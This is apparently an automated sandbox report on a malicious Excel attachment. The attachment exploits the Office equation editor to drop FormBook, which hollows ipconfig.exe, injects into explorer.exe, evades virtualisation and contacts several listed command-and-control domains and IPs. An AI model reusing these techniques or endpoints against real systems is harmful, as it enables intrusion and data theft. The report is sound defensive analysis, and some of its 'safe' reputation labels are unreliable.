Source: explorer.exe, 00000006.00000000.2182158267.0000000003C40000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSX@9/12@8/6
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00404763 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_722F4225 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040216B CoCreateInstance,MultiByteToWideChar,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$QTN3C2AF414EDF9_041873.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRBB.tmp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: QTN3C2AF414EDF9_041873.xlsx | Virustotal: Detection: 33%
Source: QTN3C2AF414EDF9_041873.xlsx | ReversingLabs: Detection: 25%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Windows\SysWOW64\ipconfig.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: QTN3C2AF414EDF9_041873.xlsxStatic file information: File size 2421248 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: ipconfig.pdb source: vbc.exe, 00000005.00000002.2205835901.00000000004F9000.00000004.00000020.sdmp
          Source: Binary string: ipconfig.pdbN source: vbc.exe, 00000005.00000002.2205835901.00000000004F9000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, ipconfig.exe
          Source: QTN3C2AF414EDF9_041873.xlsxInitial sample: OLE indicators vbamacros = False
          Source: QTN3C2AF414EDF9_041873.xlsxInitial sample: OLE indicators encrypted = True

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\Public\vbc.exe | Unpacked PE file: 5.2.vbc.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_72E31A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
          Source: z9ayiyo.dll.4.dr | Static PE information: section name: .code
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_72E32F60 push eax; ret
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_004160D8 push ebp; ret
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041C96C push cs; ret
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B3B5 push eax; ret
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B46C push eax; ret
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B402 push eax; ret
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B40B push eax; ret
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041C40D push esi; iretd
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041C485 push FFFFFFC3h; retf
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00415CA3 push edx; retf
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041CFC1 pushfd ; retf
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_004187D8 push ss; ret
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008DDFA1 push ecx; ret
          Source: C:\Users\Public\vbc.exe | Code function: 5_1_004160D8 push ebp; ret
          Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041B3B5 push eax; ret
          Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041B46C push eax; ret
          Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041B402 push eax; ret
          Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041B40B push eax; ret
          Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041C40D push esi; iretd
          Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041C485 push FFFFFFC3h; retf
          Source: C:\Users\Public\vbc.exe | Code function: 5_1_004187D8 push ss; ret
          Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041C96C push cs; ret
          Source: C:\Users\Public\vbc.exe | Code function: 5_1_00415CA3 push edx; retf
          Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041CFC1 pushfd ; retf
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_020BDFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_000960D8 push ebp; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_0009B3B5 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_0009B40B push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_0009C40D push esi; iretd
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_0009B402 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_0009B46C push eax; ret
          Source: initial sample | Static PE information: section name: .data entropy: 7.7471273442

          Persistence and Installation Behavior:

          Uses ipconfig to lookup or modify the Windows network settings
          Source: unknown | Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Users\Public\vbc.exe | File created: C:\Users\user\AppData\Local\Temp\z9ayiyo.dll (dropped file)
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe (dropped file) (x2)
          Source: C:\Users\Public\vbc.exe | File created: C:\Users\user\AppData\Local\Temp\nsqE488.tmp\System.dll (dropped file)
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winlog[1] (dropped file) (x2)

          Boot Survival:

          Drops PE files to the user root directory
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe (dropped file)
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (x10)
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX (x8)
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: QTN3C2AF414EDF9_041873.xlsx | Stream path 'EncryptedPackage' entropy: 7.99993012299 (max. 8.0)

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exe | RDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exe | RDTSC instruction interceptor: First address: 000000000008897E second address: 0000000000088984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_004088B0 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2792 | Thread sleep time: -300000s >= -30000s
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 1616 | Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\SysWOW64\ipconfig.exe | Last function: Thread delayed
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_004065C1 FindFirstFileA,FindClose,
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_004027A1 FindFirstFileA,
          Source: explorer.exe, 00000006.00000000.2168448795.00000000001F5000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.2183431407.0000000004234000.00000004.00000001.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000006.00000000.2183466751.0000000004263000.00000004.00000001.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: explorer.exe, 00000006.00000000.2183431407.0000000004234000.00000004.00000001.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.2165759515.000000000058D000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 00000006.00000000.2168570646.0000000000231000.00000004.00000020.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\Public\vbc.exe | Process information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process queried: DebugPort
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_004088B0 rdtsc
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00409B20 LdrLoadDll,
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_72E31A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_722F478F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_722F458C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008C0080 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008C00EA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008E26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_020C26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Network Connect: 103.251.44.218 80
          Source: C:\Windows\explorer.exe | Network Connect: 191.96.163.202 80
          Source: C:\Windows\explorer.exe | Network Connect: 52.57.196.177 80
          Source: C:\Windows\explorer.exe | Network Connect: 104.21.61.250 80
          Maps a DLL or memory area into another process
          Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Users\Public\vbc.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write (x2)
          Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\Public\vbc.exe | Thread register set: target process: 1388
          Source: C:\Windows\SysWOW64\ipconfig.exe | Thread register set: target process: 1388
          Queues an APC in another process (thread injection)
          Source: C:\Users\Public\vbc.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\Public\vbc.exe | Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 1A0000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: explorer.exe, 00000006.00000002.2375979053.00000000006F0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000002.2375979053.00000000006F0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.2168448795.00000000001F5000.00000004.00000020.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000006.00000002.2375979053.00000000006F0000.00000002.00000001.sdmp | Binary or memory string: !Progman
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 4.2.vbc.exe.2900000.8.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.vbc.exe.2900000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | the same 14 memory dumps and unpacked PE files listed under "Stealing of Sensitive Information" (8 MEMORY sources, 6 UNPACKEDPE sources)

          Mitre Att&ck Matrix

          Techniques are grouped by tactic column; a trailing number on a technique is the report's signature-count badge for that technique, kept as printed.

          Initial Access: Spearphishing Link 1; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
          Execution: Native API 1; Shared Modules 1; Exploitation for Client Execution 13; At (Windows); Cron; Launchd; Scheduled Task
          Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
          Privilege Escalation: Access Token Manipulation 1; Process Injection 512; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
          Defense Evasion: Masquerading 121; Virtualization/Sandbox Evasion 2; Access Token Manipulation 1; Process Injection 512; Deobfuscate/Decode Files or Information 1; Obfuscated Files or Information 41; Software Packing 12
          Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
          Discovery: Security Software Discovery 221; Virtualization/Sandbox Evasion 2; Process Discovery 3; Remote System Discovery 1; System Network Configuration Discovery 1; File and Directory Discovery 2; System Information Discovery 14
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
          Collection: Archive Collected Data 1; Clipboard Data 1; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
          Command and Control: Encrypted Channel 1; Ingress Tool Transfer 15; Non-Application Layer Protocol 3; Application Layer Protocol 123; Fallback Channels; Multiband Communication; Commonly Used Port
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
          Impact: System Shutdown/Reboot 1; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact

          Behavior Graph

          Behavior Graph ID: 356571 | Sample: QTN3C2AF414EDF9_041873.xlsx | Start date: 23/02/2021 | Architecture: WINDOWS | Score: 100

          Legend (node types in the graph): Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious, Internet

          Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for dropped file; 14 other signatures

          Process tree (numbers in square brackets are the graph's per-process count badges, kept as printed):

          EQNEDT32.EXE [13] (started)
            DNS/IP: algreenstdykeghestqw.dns.army 103.140.251.164, 49168, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam
            DNS/IP: ow.ly 54.67.57.56, 49167, 80 AMAZON-02US United States
            Dropped: C:\Users\user\AppData\Local\...\winlog[1], PE32
            Dropped: C:\Users\Public\vbc.exe, PE32
            Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
            vbc.exe [19] (started)
              Dropped: C:\Users\user\AppData\Local\...\z9ayiyo.dll, PE32
              Dropped: C:\Users\user\AppData\Local\...\System.dll, PE32
              Signatures: Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); Machine Learning detection for dropped file; 2 other signatures
              vbc.exe (started)
                Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                explorer.exe (injected)
                  DNS/IP: athara-kiano.com 103.251.44.218, 49170, 80 IDNIC-JALANET-AS-IDPTJupiterJalaArtaID Indonesia
                  DNS/IP: www.fashionwatchesstore.com 104.21.61.250, 49169, 80 CLOUDFLARENETUS United States
                  DNS/IP: 6 other IPs or domains
                  Signature: System process connects to network (likely due to code injection or exploit)
                  ipconfig.exe (started)
                    Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                    cmd.exe (started)
          EXCEL.EXE [37 19] (started)
            Dropped: C:\Users\...\~$QTN3C2AF414EDF9_041873.xlsx, data


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          QTN3C2AF414EDF9_041873.xlsx | 33% | Virustotal |
          QTN3C2AF414EDF9_041873.xlsx | 26% | ReversingLabs | Document-Office.Exploit.CVE-2017-11882

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winlog[1] | 100% | Joe Sandbox ML |
          C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winlog[1] | 36% | ReversingLabs | Win32.Backdoor.Androm
          C:\Users\user\AppData\Local\Temp\nsqE488.tmp\System.dll | 0% | Metadefender |
          C:\Users\user\AppData\Local\Temp\nsqE488.tmp\System.dll | 0% | ReversingLabs |
          C:\Users\Public\vbc.exe | 36% | ReversingLabs | Win32.Backdoor.Androm

          Unpacked PE Files

          Source | Detection | Scanner | Label
          5.2.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          4.2.vbc.exe.2900000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          5.1.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          http://www.mercadolivre.com.br/ | 0% | URL Reputation | safe
          http://www.merlin.com.pl/favicon.ico | 0% | URL Reputation | safe
          http://www.athara-kiano.com/nsag/?SFN=1e70w6qoH0iHBmxDX27vpOpA5lfYuhHzBJ3+ZXyYbvrIHeDq+MUfY30bwUf90UJ6GkTmZw==&cBb=LtD0g | 0% | Avira URL Cloud | safe
          http://www.dailymail.co.uk/ | 0% | URL Reputation | safe
          http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
          http://image.excite.co.jp/jp/favicon/lep.ico | 0% | URL Reputation | safe
          http://%s.com | 0% | URL Reputation | safe
          http://busca.igbusca.com.br//app/static/images/favicon.ico | 0% | URL Reputation | safe
          http://www.etmall.com.tw/favicon.ico | 0% | URL Reputation | safe
          http://it.search.dada.net/favicon.ico | 0% | URL Reputation | safe
          http://search.hanafos.com/favicon.ico | 0% | URL Reputation | safe
          http://cgi.search.biglobe.ne.jp/favicon.ico | 0% | Avira URL Cloud | safe
          http://www.abril.com.br/favicon.ico | 0% | URL Reputation | safe
          http://search.msn.co.jp/results.aspx?q= | 0% | URL Reputation | safe
          http://buscar.ozu.es/ | 0% | Avira URL Cloud | safe
          http://busca.igbusca.com.br/ | 0% | URL Reputation | safe
          http://search.auction.co.kr/ | 0% | URL Reputation | safe
          http://busca.buscape.com.br/favicon.ico | 0% | URL Reputation | safe
          http://www.pchome.com.tw/favicon.ico | 0% | URL Reputation | safe
          http://browse.guardian.co.uk/favicon.ico | 0% | URL Reputation | safe
          http://google.pchome.com.tw/ | 0% | URL Reputation | safe
          http://www.ozu.es/favicon.ico | 0% | Avira URL Cloud | safe
          http://search.yahoo.co.jp/favicon.ico | 0% | URL Reputation | safe
          http://www.gmarket.co.kr/ | 0% | URL Reputation | safe
          http://searchresults.news.com.au/ | 0% | URL Reputation | safe
          http://www.asharqalawsat.com/ | 0% | URL Reputation | safe
          http://search.yahoo.co.jp | 0% | URL Reputation | safe
          http://buscador.terra.es/ | 0% | URL Reputation | safe
          http://search.orange.co.uk/favicon.ico | 0% | URL Reputation | safe
          http://www.iask.com/ | 0% | URL Reputation | safe
          http://cgi.search.biglobe.ne.jp/ | 0% | Avira URL Cloud | safe
          http://search.ipop.co.kr/favicon.ico | 0% | URL Reputation | safe
          http://p.zhongsou.com/favicon.ico | 0% | Avira URL Cloud | safe
          http://service2.bfast.com/ | 0% | URL Reputation | safe
          http://www.%s.comPA | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
ow.ly | 54.67.57.56 | true | false | - | high
algreenstdykeghestqw.dns.army | 103.140.251.164 | true | false | - | unknown
overseaexpert.com | 191.96.163.202 | true | true | - | unknown
athara-kiano.com | 103.251.44.218 | true | true | - | unknown
www.fashionwatchesstore.com | 104.21.61.250 | true | true | - | unknown
oryanos-env.eba-4sqpgjbe.eu-central-1.elasticbeanstalk.com | 52.57.196.177 | true | false | - | high
www.evoslancete.com | unknown | unknown | true | - | unknown
www.athara-kiano.com | unknown | unknown | true | - | unknown
www.oryanomer.com | unknown | unknown | true | - | unknown
www.overseaexpert.com | unknown | unknown | true | - | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.athara-kiano.com/nsag/?SFN=1e70w6qoH0iHBmxDX27vpOpA5lfYuhHzBJ3+ZXyYbvrIHeDq+MUfY30bwUf90UJ6GkTmZw==&cBb=LtD0g | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://search.chol.com/favicon.ico | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.mercadolivre.com.br/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.merlin.com.pl/favicon.ico | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://search.ebay.de/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.mtv.com/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.rambler.ru/ | explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | false | - | high
